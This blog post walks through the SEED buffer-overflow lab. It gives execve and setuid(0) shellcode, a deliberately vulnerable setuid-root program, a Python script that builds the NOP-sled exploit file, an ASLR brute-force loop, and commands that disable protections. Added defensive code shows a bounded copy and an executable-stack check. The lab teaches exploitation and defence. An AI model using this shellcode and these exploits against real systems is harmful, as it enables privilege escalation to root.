
10/30 Buffer overflow lab based on SeedUbuntu16.04

Posted: 2022-10-30 16:15:40
Tags: bin, 10, char, 30, argv, SeedUbuntu16.04, eax, ebx, stack

sudo sysctl -w kernel.randomize_va_space=0

gcc -fno-stack-protector example.c

gcc -z execstack -o test test.c

/* call_shellcode.c
 *
 * Set up the four registers eax, ebx, ecx and edx:
 *   eax holds the execve system call number, 11
 *   ebx holds the address of the command string "/bin/sh"
 *   ecx holds the address of argv, with argv[0] = "/bin/sh" and argv[1] = NULL
 *   edx holds the address of the environment passed to the new program, here 0
 */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

const char code[] =
// set ebx
"\x31\xc0" // xorl %eax,%eax: XOR eax with itself to zero it, avoiding a 0 byte in the code
"\x50" // pushl %eax: push the terminating 0 of "/bin/sh" first
"\x68""//sh" // pushl $0x68732f2f: push "//sh"
"\x68""/bin" // pushl $0x6e69622f: push "/bin"; "/bin/sh" is now fully on the stack and esp points at its start
"\x89\xe3" // movl %esp,%ebx: copy esp into ebx

// set ecx
"\x50" // pushl %eax: argv[1] = NULL
"\x53" // pushl %ebx: argv[0] = "/bin/sh"; esp now points at the start of argv
"\x89\xe1" // movl %esp,%ecx: copy esp into ecx

// set edx
"\x99" // cdq: sets edx to 0 as a side effect (sign-extends eax into edx:eax)

// set eax
"\xb0\x0b" // movb $0x0b,%al: set eax to 11, the execve system call number
"\xcd\x80" // int $0x80: invoke the system call
;

int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
((void(*)( ))buf)( );
}

gcc -z execstack -o call_shellcode call_shellcode.c

/* stack.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Changing this size will change the layout of the stack.
 * Instructors can change this value each year, so students
 * won't be able to use the solutions from the past.
 * Suggested value: between 0 and 400 */
#ifndef BUF_SIZE
#define BUF_SIZE 24
#endif

int bof(char *str)
{
char buffer[BUF_SIZE];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str); /* ➀ */
return 1;
}

int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
/* Change the size of the dummy array to randomize the parameters
for this lab. Need to use the array at least once */
char dummy[BUF_SIZE]; memset(dummy, 0, BUF_SIZE);
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
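The overflow in bof() exists because strcpy() has no idea how large buffer[] is. As an added example (not part of the SEED lab's stack.c), here is a bounded replacement, bof_safe(), that takes the input length explicitly and refuses inputs that do not fit, together with a hypothetical process_badfile() that mirrors the lab's main(); BUF_SIZE and the 517-byte read are taken from stack.c.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not part of the lab's stack.c: a bounded replacement
 * for bof(). strcpy() copies until the first NUL byte, so a str longer
 * than BUF_SIZE runs past buffer[] into the saved frame pointer and
 * return address. Here the caller passes the input length and the copy
 * is refused when it does not fit, so those slots are never touched. */
#ifndef BUF_SIZE
#define BUF_SIZE 24
#endif

/* Returns 1 if the copy happened, 0 if the input was rejected. */
int bof_safe(const char *str, size_t len)
{
    char buffer[BUF_SIZE];

    /* Need room for len bytes plus a terminating NUL. */
    if (len >= sizeof(buffer))
        return 0;
    memcpy(buffer, str, len);
    buffer[len] = '\0';
    return 1;
}

/* Mirrors main() of stack.c: read up to 517 bytes from the file and
 * hand bof_safe() the number of bytes actually read, not a NUL-delimited
 * string. Returns -1 if the file cannot be opened. */
int process_badfile(const char *path)
{
    char str[517];
    FILE *badfile = fopen(path, "r");
    if (badfile == NULL)
        return -1;
    size_t n = fread(str, sizeof(char), sizeof(str), badfile);
    fclose(badfile);
    return bof_safe(str, n);
}

int main(void)
{
    int r = process_badfile("badfile");
    puts(r == 1 ? "Returned Properly" : "Input rejected");
    return 0;
}
```

With the lab's 517-byte badfile the program now prints "Input rejected" instead of transferring control to whatever the file placed in the return-address slot.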

$ gcc -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack

import sys
shellcode= (
"\x31\xc0" # xorl %eax,%eax
"\x50" # pushl %eax
"\x68""//sh" # pushl $0x68732f2f
"\x68""/bin" # pushl $0x6e69622f
"\x89\xe3" # movl %esp,%ebx
"\x50" # pushl %eax
"\x53" # pushl %ebx
"\x89\xe1" # movl %esp,%ecx
"\x99" # cdq
"\xb0\x0b" # movb $0x0b,%al
"\xcd\x80" # int $0x80
"\x00"
).encode('latin-1')

# Build a 517-byte array filled with NOPs
content = bytearray(0x90 for i in range(517))

# Put the shellcode at the end of the file
start = 517 - len(shellcode)
content[start:] = shellcode

# Build the return address and place it at the right offset
ret = 0xbfffeb48 + 100  # return address: ebp+4 taken from the debugging session
offset = 36  # offset from the start of buffer to the return address slot
content[offset:offset + 4] = (ret).to_bytes(4, byteorder='little')

# Write the content to badfile
with open('badfile', 'wb') as f:
    f.write(content)

sudo ln -sf /bin/dash /bin/sh

// dash_shell_test.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
char *argv[2];
argv[0] = "/bin/sh";
argv[1] = NULL;
// setuid(0); ➀
execve("/bin/sh", argv, NULL);
return 0;
}

char shellcode[] =
"\x31\xc0" // xorl %eax,%eax: zero eax
"\x31\xdb" // xorl %ebx,%ebx: zero ebx
"\xb0\xd5" // movb $0xd5,%al: set eax to 0xd5, the setuid system call number
"\xcd\x80" // int $0x80: execute setuid(0), setting the real user id to root

// The remaining bytes are the same as in Task 2
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;

sudo /sbin/sysctl -w kernel.randomize_va_space=2

#!/bin/bash

SECONDS=0
value=0
while [ 1 ]
do
value=$(( $value + 1 ))
duration=$SECONDS
min=$(($duration / 60))
sec=$(($duration % 60))
echo "$min minutes and $sec seconds elapsed."
echo "The program has been running $value times so far."
./stack
done

sudo /sbin/sysctl -w kernel.randomize_va_space=0

gcc -o stack -z execstack stack.c
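Whether a binary was built with -z execstack is recorded in its PT_GNU_STACK program header, so the mitigation state can be verified from the file itself rather than from memory. The following checker is an added example, not part of the lab; it reads the Elf32 fields at their fixed offsets (no <elf.h>), and the function name elf32_stack_executable() and the 1 MiB read buffer are choices made here.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Added example, not part of the lab: report whether a 32-bit little-endian ELF
 * image was linked with -z execstack. The linker records that request in the
 * PT_GNU_STACK program header; if its p_flags carries PF_X the kernel maps the
 * stack executable, which is what lets the stack-resident shellcode in this lab run.
 * Returns 1 (executable stack), 0 (non-executable), or -1 (not a 32-bit LE ELF,
 * truncated, or no PT_GNU_STACK header, in which case the linker default applies). */
#define PT_GNU_STACK_TYPE 0x6474e551u
#define PF_X_FLAG 0x1u

static uint32_t rd32(const unsigned char *p) { return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24); }
static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

int elf32_stack_executable(const unsigned char *img, size_t len)
{
    /* e_ident: ELF magic, EI_CLASS == ELFCLASS32 (1), EI_DATA == ELFDATA2LSB (1) */
    if (len < 52 || memcmp(img, "\x7f""ELF", 4) != 0 || img[4] != 1 || img[5] != 1)
        return -1;
    uint32_t phoff = rd32(img + 28);      /* e_phoff */
    uint16_t phentsize = rd16(img + 42);  /* e_phentsize */
    uint16_t phnum = rd16(img + 44);      /* e_phnum */
    if (phentsize < 32)
        return -1;
    for (uint16_t i = 0; i < phnum; i++) {
        uint64_t off = (uint64_t)phoff + (uint64_t)i * phentsize;
        if (off + 32 > len)
            return -1;                    /* program header table is truncated */
        const unsigned char *ph = img + off;
        if (rd32(ph) == PT_GNU_STACK_TYPE)              /* p_type */
            return (rd32(ph + 24) & PF_X_FLAG) ? 1 : 0; /* p_flags */
    }
    return -1;
}

int main(int argc, char **argv)
{
    static unsigned char img[1 << 20];    /* ample for the small lab binaries */
    FILE *f = argc > 1 ? fopen(argv[1], "rb") : NULL;
    if (f == NULL) { fprintf(stderr, "usage: %s <elf32-binary>\n", argv[0]); return 2; }
    size_t n = fread(img, 1, sizeof img, f);
    fclose(f);
    int r = elf32_stack_executable(img, n);
    printf("%s\n", r == 1 ? "executable stack (-z execstack)" : r == 0 ? "non-executable stack" : "no verdict");
    return r < 0 ? 2 : 0;
}
```

Run it against the stack binary built above with and without -z execstack to see the two verdicts; a non-executable stack is the default for binaries gcc produces on this distribution unless the flag is given.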

From: https://www.cnblogs.com/shenyvjie/p/16841476.html
